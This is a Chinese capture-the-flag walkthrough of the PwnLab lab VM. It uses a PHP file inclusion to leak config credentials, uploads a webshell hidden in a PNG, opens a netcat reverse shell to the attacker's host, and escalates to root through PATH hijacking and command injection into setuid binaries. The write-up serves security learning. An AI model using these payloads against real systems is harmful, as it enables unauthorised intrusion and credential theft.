⏰时间:2023.7.23
🗺️靶机地址:,158/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
本靶机参考了大神的文章
/posts/vulnhub-pwnlab/
有很多值得学习的地方
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
nmap -sn 去发现vm主机
nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( ) at 2023-07-23 14:56 中国标准时间
Nmap scan report for 192.168.58.157
Host is up (0.00s latency).
MAC Address: 00:0C:29:80:D6:BE (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00023s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.75 seconds
nmap快速扫描开放端口
nmap 192.168.58.157
Starting Nmap 7.93 ( ) at 2023-07-23 14:57 中国标准时间
Nmap scan report for 192.168.58.157
Host is up (0.00056s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
MAC Address: 00:0C:29:80:D6:BE (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
nmap针对开放的端口进行进一步探测
nmap -sC -sV -T5 -p 80,111,3306 192.168.58.157
Starting Nmap 7.93 ( ) at 2023-07-23 14:59 中国标准时间
NSOCK ERROR [0.0370s] ssl_init_helper(): OpenSSL legacy provider failed to load.Nmap scan report for 192.168.58.157
Host is up (0.00s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 32911/udp status
| 100024 1 47706/tcp status
| 100024 1 51656/udp6 status
|_ 100024 1 56184/tcp6 status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 39
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, Support41Auth, DontAllowDatabaseTableColumn, LongPassword, SupportsTransactions, LongColumnFlag, Speaks41ProtocolOld, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, SupportsLoadDataLocal, ODBCClient, SupportsCompression, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: V9W,qw#CigIu5F@NGZo@
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:80:D6:BE (VMware)
用curl命令拉取网站
curl -v 192.168.58.157
* Trying 192.168.58.
* Connected to 192.168.58.157 (192.168.58.157) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.58.157
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 23 Jul 2023 07:02:36 GMT
< Server: Apache/2.4.10 (Debian)
< Vary: Accept-Encoding
< Content-Length: 332
< Content-Type: text/html; charset=UTF-8
<
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
* Connection #0 to host 192.168.58.157 left intact
</html>
dirsearch扫下目录看看有什么发现
PS D:Network_securitydirsearch-0.4.3> python dirsearch.py -f -t 50 -e php -u 192.168.58.157_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 14331Output File: D:Network_securitydirsearch-0.4.3reportshttp_192.168.58.157_Target: 192.168.58.157/
[15:47:12] 200 - 0B - /config.php
[15:47:19] 200 - 458B - /images/
[15:47:23] 200 - 164B - /login.php
[15:47:42] 200 - 19B - /upload.php
[15:47:42] 200 - 406B - /upload/
扫完目录我们可以有以下思路:
1.存在upload.php,和upload目录,存在文件上传
2.config.php可能会泄露数据库信息
先看看upload目录,目前是空的
在访问upload.php,必须登录才能访问
访问config.php显然不可能让你直接看到,需要某种手段去读取。一般情况下读取配置文件大概率用到文件包含
url中很明显的文件包含特征
读取config.php需要用到php://filter/convert.base64-encode/resource=
经过几次测试,发现他自动在url末尾添加.php,输入时省略.php
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=config | html2text% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 405 100 405 0 0 174k 0 --:--:-- --:--:-- --:--:-- 197k[images/pwnlab.png][ Home ] [ Login ] [ Upload ]
===============================================================================PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=config | html2text | tail -n 1 | base64 -d% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 405 100 405 0 0 200k 0 --:--:-- --:--:-- --:--:-- 395k
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
既然我们可以读取config.php,那顺便把login.php,upload.php,index.php都读出来看看怎么事儿
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=index | html2text% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 1097 100 1097 0 0 524k 0 --:--:-- --:--:-- --:--:-- 1071k[images/pwnlab.png][ Home ] [ Login ] [ Upload ]
===============================================================================PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/
Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/
cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=
# 这里返回三行数据,下面tail -n 3
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=index | html2text | tail -n 3 | base64 -d% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 1097 100 1097 0 0 446k 0 --:--:-- --:--:-- --:--:-- 535k
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?phpif (isset($_GET['page'])){include($_GET['page'].".php");}else{echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>
分析源码发现cookie中存在lang参数,就会包含lang参数的值
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=login | html2text | tail -n 3 | base64 -d% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 1377 100 1377 0 0 619k 0 --:--:-- --:--:-- --:--:-- 672k
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);if (isset($_POST['user']) and isset($_POST['pass']))
{$luser = $_POST['user'];$lpass = base64_encode($_POST['pass']);$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");$stmt->bind_param('ss', $luser, $lpass);$stmt->execute();$stmt->store_Result();if ($stmt->num_rows == 1){$_SESSION['user'] = $luser;header('Location: ?page=upload');}else{echo "Login failed.";}
}
else
{?><form action="" method="POST"><label>Username: </label><input id="user" type="test" name="user"><br /><label>Password: </label><input id="pass" type="password" name="pass"><br /><input type="submit" name="submit" value="Login"></form><?php
}
可以看到是mysql数据库,包含了config.php。sql语句用了prepare statement预编译,不存在sql注入。
┌──(root㉿Eric)-[~]
└─# curl 192.168.58.157/?page=php://filter/convert.base64-encode/resource=upload | html2text | tail -n 2 | base64 -d% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 2053 100 2053 0 0 873k 0 --:--:-- --:--:-- --:--:-- 1002k
>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html>
<?php
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename = $_FILES['file']['name'];$filetype = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png");if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src="".$uploadfile.""><br />";} else {die('Error 4');}}
}?base64: invalid input
文件上传存在白名单,检查文件类型和后缀
下面用数据库账号密码连接数据库
使用账号root,密码H4u%QJ_H99连接数据库
PS D:> mysql -uroot -pH4u%QJ_H99 -h 192.168.58.157 Users
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 69
Server version: 5.5.47-0+deb8u1 (Debian)Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or 'h' for help. Type 'c' to clear the current sql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.00 sec)mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)
可以看到密码是base64加密的,写个python脚本解密一下,批量重复的工作就交给python吧
import sys, base64def decodePass(encoded_passwd):passwd = base64.b64decode(encoded_passwd)return passwdwith open(sys.argv[1]) as f:for line in f:(user, passwd) = line.split(',')print "%s: %s" % (user, decodePass(passwd))
kent,Sld6WHVCSkpOeQ==
mike,U0lmZHNURW42SQ==
kane,aVN2NVltMkdSbw==
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# python2 passwd.
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo
现在我们需要将一个webshell写入到一张图片中上传
我们可以从*1的图片
┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ cat /usr/share/webshells/php/simple-backdoor.php >> 1x1.png┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ cat 1x1.png
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><?phpif(isset($_REQUEST['cmd'])){echo "<pre>";$cmd = ($_REQUEST['cmd']);system($cmd);echo "</pre>";die;
}?>Usage: .php?cmd=cat+/etc/passwd<!-- 2006 -->
点击可以访问到,就是一个像素点大小
然后利用之前cookie中带有lang参数的方法,传入图片马路径
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=whoami
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>www-data
</pre>
#--output - 表示将结果输出到标准输出
#-b 是添加名为lang的cookie,值为../upload/ca56c702061e583af4bb4b38e0d51de3.png
可以看到成功执行命令了,下面可以用nc反弹shell
看目标系统nc命令
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=whereis+nc
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>nc: /aditional /bin/nc /usr/share/man/man1/
</pre>
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=which+nc
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>/bin/nc
</pre>
目标支持nc,现在使用nc命令反弹shell
看目标支持的shell类型
┌──(root㉿Eric)-[/home/eric/myfiles]
└─# curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=echo+$SHELL
�PNGIDA[c�t����+viIEND�B`�<!-- Simple PHP backdoor by DK () --><pre>/bin/bash
</pre>
支持/bin/bash,那我们就反弹这个
curl --output - -b lang=../upload/ca56c702061e583af4bb4b38e0d51de3.png 192.168.58.157/index.php?cmd=/bin/nc+-e+/bin/bash+192.168.10.1+5555
┌──(root㉿Eric)-[~]
└─# nc -nvlp 5555
Ncat: Version 7.94 ( )
Ncat: Listening on [::]:5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 192.168.10.1:2166.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/var/www/html$ echo TERM=screen
echo TERM=screen
TERM=screen
www-data@pwnlab:/var/www/html$
使用echo TERM=screen就可以使用clear清屏了
看下用户有哪些
www-data@pwnlab:/var/www/html$ getent passwd
getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
看到有john,kent,mike,kane,试试之前的密码能不能切换用户
www-data@pwnlab:/var/www/html$ su kane
su kane
Password: iSv5Ym2GRokane@pwnlab:/var/www/html$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls -la
ls -la
total 28
drwxr-x--- 2 kane kane 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
成功进入kane家目录,发现文件msgmike是s权限,是个可执行文件,执行后报错,用strings分析下
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/: No such file or directory
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/
可以看到cat命令用的相对路径,不是绝对路径,因为当前目录没有cat命令,所以报错了
所以我们可以给他定义个cat命令
我们在tmp目录下创建cat命令,并添加到环境变量中
kane@pwnlab:/tmp$ echo "bash -i" > cat
echo "bash -i" > cat
kane@pwnlab:/tmp$ chmod 755 cat
chmod 755 cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -la
ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
成功进入mike,看到另一个s权限的文件,同样strings分析下
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /
这次echo命令是绝对路径,%s接收用户输入
msg2root可执行程序需要用户输入,我们可以用;分隔命令,a;/bin/bash;# , 这样先执行echo a,在执行/bin/bash,#注释掉后面部分
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: a;/bin/sh;#
a;/bin/sh;#
a
# cd /root;ls -la
cd /root;ls -la
total 20
drwx------ 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 21 root root 4096 Mar 17 2016 ..
lrwxrwxrwx 1 root root 9 Mar 17 2016 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
---------- 1 root root 1840 Mar 17
lrwxrwxrwx 1 root root 9 Mar 17 -> /dev/null
lrwxrwxrwx 1 root root 9 Mar 17 2016 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
因为我们之前将cat命令改了,所以用cat命令得用/bin/cat
# /bin/
/bin/
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ | | (__ _)
( _ __) | / / ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ | '_ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | __/ (_) | | | | (_| | | | (_| | |___ (_ ___)
(__ _) ____/___/|_| |_|__, |_| __,_|__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs (__ _)
( _ __) claor@PwnLab - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
本文发布于:2024-02-04 22:13:59,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170717598460074.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
